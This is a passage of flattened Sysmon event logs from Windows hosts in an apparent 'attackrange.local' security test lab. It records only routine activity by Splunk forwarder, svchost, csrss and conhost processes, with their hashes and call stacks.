Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50085-false10.0.1.12-8089- 23542300x800000000000000082232Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.706{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD2F387FC0C40A3CE69118CC318EE766,SHA256=3B88DA3EBE4A1309CD1E912F33F47395A444DA4496BE2E382BDF5D633E115439,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082231Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B373-615A-6501-00000000FD01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082230Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082229Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082228Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082227Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082226Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082225Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082224Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082223Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082222Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082221Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B373-615A-6501-00000000FD01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082220Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.375{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B373-615A-6501-00000000FD01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082219Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:31.376{2FDD8D40-B373-615A-6501-00000000FD01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082250Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.719{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AEB71095173E6510A730153A62BA7BC,SHA256=C7C77C86256E04220122056365890AE9334E9429D4EE3D5EEC629B86B55EA168,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104385Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:32.812{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C7FE971C73A2084A05D31568095D0C8,SHA256=60BE01412EC57BFED41AE8383CE1B312DDFB52E53DC1841E5015534E35D0F87A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104384Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:32.077{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=3F0EC277FAA84082DE1D0D81A9D32C36,SHA256=E33789FBF0A04B3470467A17C14BC38BDCDFB5D97B762CBDB621CE5E170C949C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082249Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.391{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD05727232D80F1FD5AAF5149925092B,SHA256=89632D73656130828A6FDEB086909F1E2C3810D410494119B9B85A1B9DE0AAEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082248Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.391{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A004E0C0CBF25DA65B8316D92B537C9,SHA256=70D2648CFBC9CDABE72C83F69F35A8BEF12E3688A1A05DDCB614A93B6B8560EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082247Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.203{2FDD8D40-B374-615A-6601-00000000FD01}39482388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082246Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B374-615A-6601-00000000FD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082245Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082244Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082243Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082242Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082241Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082240Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082239Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082238Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 